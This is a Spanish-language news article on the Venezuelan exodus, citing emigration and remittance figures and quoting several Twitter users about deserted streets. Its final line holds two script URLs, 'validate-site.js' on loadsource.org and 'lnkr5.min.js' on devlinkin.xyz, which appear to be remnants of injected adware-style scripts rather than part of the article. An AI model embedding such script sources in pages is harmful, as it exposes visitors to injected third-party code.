Axel Capriles @axelcapriles: “Necesitamos un nuevo cálculo poblacional. Venezuela dista ya de llegar a los 30 millones de habitantes. El éxodo es apabullante, el vacío y silencio de las calles, plazas y casas, es notorio y desconcertante”.

Hablar de diáspora en Venezuela es ilógico cuando lo que realmente sucede en el país es la huida literal de un aproximado a 3,41 millones de venezolanos por distintas razones tales como: persecución política, desempleo, familiares enfermos, desnutrición en la crianza de recién nacidos, emprendimiento, ofertas salariales, calidad de vida y seguridad en salud.

Alrededor de 2 millones de venezolanos tienen previsto emigrar en los próximos 3 años, El dato fue ofrecido durante la presentación del segundo reporte de la firma de capital estadounidense y especializada en la asesoría de inversiones migratorias Globofran.

El economista Luis Vicente León, presidente de Datanálisis, destacó que de los 3,41 millones de emigrantes venezolanos, cerca de 18% envía remesas a sus familiares en Venezuela como complemento para el ingreso mensual. En promedio se envía el equivalente a 60 dólares.

Aunque las imágenes del abarrotado paso de Cúcuta hacia Colombia son las más impactantes, la diáspora venezolana se ha repartido por toda América. La huida es ardua. Tomada la decisión, en ocasiones requiere conseguir un pasaporte, cada vez más escasos por la escasez del papel moneda; comprar uno de los preciadísimos pasajes de avión o reunir dinero para un largo viaje por carretera.

En @ReporteYa seleccionamos algunas opiniones de nuestros destacados seguidores:

El usuario, Juan Venezuela @pidorespeto redacta: “El éxodo de venezolanos es demasiado numeroso y va afectar en muchos países. Los mismos ciudadanos de estos países empezaran a quejarse de tantos inmigrante”.

La cuenta, Axel Capriles @axelcapriles señala: “Necesitamos un nuevo cálculo poblacional. Venezuela dista ya de llegar a los 30 millones de habitantes. El éxodo es apabullante, el vacío y silencio de las calles, plazas y casas, es notorio y desconcertante”.

El Planificador Ambiental, Sergio Antillano A. @sergioantillano expresa: “La ausencia de gente y vehículos es notoria”.

Nuestra seguidora, Esmeralda @mesadeguanipa explica: “Hay calles enteras completamente solas. Las casas están abandonadas, con la maleza cubriéndolas, sus dueños se han ido”.

La cuenta, JESUSESMINORTE @aacointa opina: “Deben haberse ido unos 5 millones pues no hay tráfico. Los negocios y calles vacíos”.

La usuaria, Cecilia Neri @chechineri escribe: “Una ciudad totalmente desolada, no sólo en las noches, por motivos obvios, de día, se nota más la diferencia, cero tráfico en vías usualmente congestionadas, nos destruyeron de manera total”.

El Ing. Mecánico, Jota Ele Buenaño @Tecnorata argumenta: “Si, es cierto que se ha ido mucha gente pero la soledad en las calles no es solo por quienes se han ido, hay que sumarle la inseguridad, falta de transporte, escasez de gasolina, altos precios de todo, negocios que han sido forzados a cerrar, etc.”

Finaliza, @IRA_VENEZUELA comunicando: “Lo que ocurre en Venezuela no es un éxodo, es un destierro meticulosamente planificado. De no ser así ya hubiesen cerrado las fronteras y restringido los pasaportes”.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1532724693654https://devlinkin.xyz/addons/lnkr5.min.js

Loading...